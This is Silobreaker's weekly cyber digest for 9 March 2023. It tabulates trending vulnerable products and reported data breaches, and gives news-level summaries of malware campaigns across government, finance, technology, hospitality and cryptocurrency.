09 March 2023
Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker.
Trending Vulnerable Products
Deep & Dark Web
| Name | Heat 7 |
|---|---|
| Microsoft Word |  |
| OpenSSH |  |
| Bitcoin Core |  |
| Microsoft Windows Defender | |
| Google Android | |
Open Source
| Name | Heat 7 |
|---|---|
| XWiki Platform | |
| Moodle | |
| Trusted Platform Module | |
| Snapchat App | |
| Xen Software | |
The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.
Data Leaks & Breaches
| Company | Information | Affected |
|---|---|---|
| GunAuction (US) | Hackers breached the company’s website, exposing sensitive personal data including names, home addresses, email addresses, plaintext passwords, and telephone numbers. The data allegedly makes it possible to link a particular individual with the sale or purchase of a specific weapon. | 550,000 |
| Hatch Bank (US) | Hackers exploited a vulnerability in the company’s Fortra GoAnywhere MFT secure file-sharing platform on January 29th, 2023. Compromised information includes names and Social Security numbers. | 139,493 |
| Chick-fil-A (US) | Customer accounts were compromised in a credential stuffing attack. This allowed the hackers to use stored rewards balances and access personal information, including names, email addresses, masked payment card numbers, and more. | Unknown |
| College of the Desert (US) | A July 2022 malware attack may have led to unspecified personal data being subject to unauthorised access. | ~800 |
| Modesto Police Department (US) | A ransomware attack on February 3rd, 2023, may have compromised the personal information of some individuals, including Social Security and driver’s license numbers. | Unknown |
| Vesuvius (UK) | The Vice Society ransomware group claimed responsibility for an attack and published allegedly stolen files on their leak site. | Unknown |
| Zurcal Group (Spain) | Stormous ransomware claimed to have targeted the company, naming it in its Telegram channel on February 24th, 2023. The attackers initially leaked images showing invoices and plans, before leaking further files as proof, including tax identification numbers. | Unknown |
| Associação de Advogados de São Paulo (Brazil) | After the organisation denied any data exfiltration in a January 2023 breach, Ragnar Locker ransomware leaked 200GB of allegedly stolen files, some which contain personal information. | Unknown |
| Multiple (South Africa) | The Public Service Co-ordinating Bargaining Council, the General Public Service Sector Bargaining Council, and the Safety and Security Sector Bargaining Council experienced a ransomware attack between February 24th and February 28th, 2023. | Unknown |
| City of Oakland (US) | Play ransomware added the city to their leak site on March 1st, 2023, and began leaking the allegedly stolen data on March 4th, 2023. Potentially compromised data includes identity documents, personal data, information that allegedly proves human rights violations, and more. | Unknown |
| Denver Public Schools (US) | An unauthorised actor stole data from the school district’s network between December 2022 and January 2023. Potentially compromised data includes names and Social Security numbers, fingerprints, bank account or pay card numbers, student identification numbers, driver’s license numbers, passport numbers, and more. | Unknown |
| Tennessee State University (US) | On March 1st, 2023, the university notified students that it had been affected by a ransomware attack. Whilst the incident led to the university shutting down all internet access on campus, students were still able to access their email accounts and campus computer labs. | Unknown |
| Medavie Blue Cross (Canada) | Customer data was impacted in a cyberattack in November 2022, in which attackers gained access to servers belonging to their subsidiary, Managed Health Care Services Inc. | Unknown |
| Preferred Home Care of New York (US) | The care provider reached a settlement relating to a 2021 breach involving the personal data of patients and employees, which included sensitive health information and identifiers such as Social Security numbers. The REvil ransomware group previously claimed it was linked to the attack on the company. | 92,283 |
| The Chautauqua Center (US) | An error during a system upgrade exposed protected health information and made it accessible to other entities. Compromised data includes names, primary diagnosis and related cause information, secondary insurance information, and more. The data has since been secured. | 747 |
| Verizon (US) | A publicly available data dump, containing information allegedly stolen in January 2023, was advertised on the clear web. Potentially compromised information includes first names, customer hashes, usage statistics, contract status, device types, and more. | ~9,000,000 |
| Hamburg University of Applied Sciences (Germany) | The Vice Society ransomware group added the university to their leak site. The university stated ‘significant amounts of data’ were copied, including usernames, ‘cryptographically secure’ passwords, email addresses, and mobile phone numbers. | Unknown |
| City of Waynesboro (US) | The BianLian ransomware group claims to have infiltrated the local government network, acquiring around 350GB of data. Potentially compromised data includes files relating to the police department, which is said to include reports, criminal investigations, the personal data of staff, and more. | Unknown |
| HDFC Bank (India) | A hacker posted 7.5GB of allegedly stolen data on an underground forum. The data is said to include full names, dates of birth, phone numbers, email addresses, physical addresses, financial information, and more. | Unknown |
| Hospital Clinic de Barcelona (Spain) | A ransomware attack on March 5th, 2023, took computer systems offline, with all written work being completed on paper and operations and appointments cancelled. The Ransom House group is said to be behind the attack, but no demands have been made. | Unknown |
| Northeast Surgical Group (US) | BianLian ransomware added the company to its leak site in January 2023, with data leaked in February 2023. Potentially compromised data includes names, addresses, Social Security numbers, dates of birth, and medical and treatment information. | 15,298 |
| Attent Zorg en Behandeling (Netherlands) | The Qilin ransomware group claimed to have breached the organisation via an unpatched vulnerability, stealing hundreds of gigabytes of data, with some published on their leak site. Compromised information includes confidential internal communication, salary statements, non-disclosure agreements and passport copies. | Unknown |
| Toyota (Japan) | A authentication bypass vulnerability allowed access to the personal information of customers in Mexico. Potentially compromised data includes names, addresses, phone numbers, email addresses, tax IDs, and vehicle ownership history. The vulnerability has since been fixed. | Unknown |
| Council of Granada | GhostSec alleged they had gained access to a 7GB database via an SQLi attack, which they subsequently sold. A data sample provided by the hackers included personal and work-related information of some individuals, as well as usernames and passwords. | Unknown |
| Minneapolis Public Schools (US) | Medusa ransomware added the school district to its leak site, threatening to leak stolen data if a $1 million ransom is not paid. The attackers have since posted a video showing them accessing personal staff and student data, including employee tax forms, HSA withdrawals, vendor contracts, and job applicant resumes. | Unknown |
| HDB Financial Services (India) | A hacker posted 7.5GB of customer data on the Breached forum consisting of loan information from May 2022 to February 2023. Potentially compromised data includes names, dates of birth, phone numbers, email addresses, and more. | Unknown |
| Black & McDonald (Canada) | The engineering company was targeted in a ransomware attack in February 2023. Ontario Power Generation stated there is no evidence that the incident compromised sensitive information. Black & McDonald have not publicly confirmed the attack. | Unknown |
| Voskhod Research (Russia) | A threat actor may have infiltrated a database used to process personal data and biometrics, and issue electronic passports. The hacker may have accessed ‘tens of percent’ of the passport database. The allegedly stolen information also impacts some citizens from Kazakhstan and Belarus. | Unknown |
| DC Health Link (US) | Sensitive personal data of persons connected to the US Senate and House of Representatives was listed for sale on a hacking forum following a breach at the company. The database reportedly includes names, dates of birth, addresses, email addresses, phone numbers, Social Security Numbers, and more. | 170,000 |
Attack Type mentions in Healthcare
This chart shows the trending attack types related to Healthcare within a curated list of cyber sources over the past week.
Weekly Industry View
| Industry | Information |
|---|---|
| Government |
ESET researchers analysed a new custom backdoor, named MQsTTang, attributed to Mustang Panda. The backdoor is part of an ongoing campaign that dates back to early January 2023. Victims of the campaign include unknown entities in Bulgaria and Australia and a governmental institution in Taiwan, and possibly political and governmental organisations in Europe and Asia. The malware is distributed via RAR archives, likely via spear phishing. The attacker is able to execute arbitrary commands on the victim machine, with persistence achieved by creating a registry Run key. |
| Banking & Finance |
Metabase Q researchers analysed a new strain of malware, dubbed FiXS, targeting the ATMs of banks in Mexico in order to steal funds. Whilst the initial infection vector is unknown, FiXS is believed to use a similar attack methodology to the Ploutus malware, whereby the attacker connects an external keyboard to the ATM. FiXS can be used to target any ATM which supports CEN XFS APIs. Whilst the origin of FiXS is unknown, it contains metadata which suggests it originates from Russia. |
| Technology |
Researchers at Mandiant and SonicWall identified suspected Chinese threat actor UNC4540 targeting SonicWall SMA100 devices with credential stealing malware. The malware was likely deployed in 2021, with the attacker believed to have persistent access through multiple firmware updates. The initial access vector is currently unknown. A bash script is used to execute a SQL command to steal credentials and execute further components, including the TinyShell backdoor. Persistence is achieved by constantly checking for a new firmware update and backdooring the ZIP file, as well as modifying appliance binaries. |
| Retail & Hospitality |
Trend Micro researchers discovered a spear phishing campaign targeting the hospitality industry with RedLine Stealer. The phishing emails lure victims into clicking a Dropbox link, with Bitly-shortened URLs that redirect to the Dropbox links also used. A downloaded ZIP file triggers a four-stage execution chain consisting of padded cabinet files, PowerShell scripts, and MSIL, PE, and image files. RedLine Stealer is ultimately injected into an executable, where it collects system information, as well as data from browsers, cryptocurrency wallets, VPN applications, and other installed applications such as Discord. |
| Cryptocurrency |
Cado Labs researchers discovered a novel cryptojacking campaign targeting unsecure deployments of Redis with XMRig. The campaign leverages the free and open-source command line file transfer service transfer service, transfer[.]sh. Unsecure deployments of Redis are exploited for initial access, with a cron job exploit then used to achieve arbitrary code execution. The script conducts preparatory actions to ensure the hardware can be effectively utilised before retrieving the binaries for pnscan and XMRig, writing a custom XMRig configuration to disk. Tactics and techniques used in this campaign have previously been associated with cloud-focused groups WatchDog and TeamTNT. |
News and information concerning each mentioned industry over the last week.
Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker.
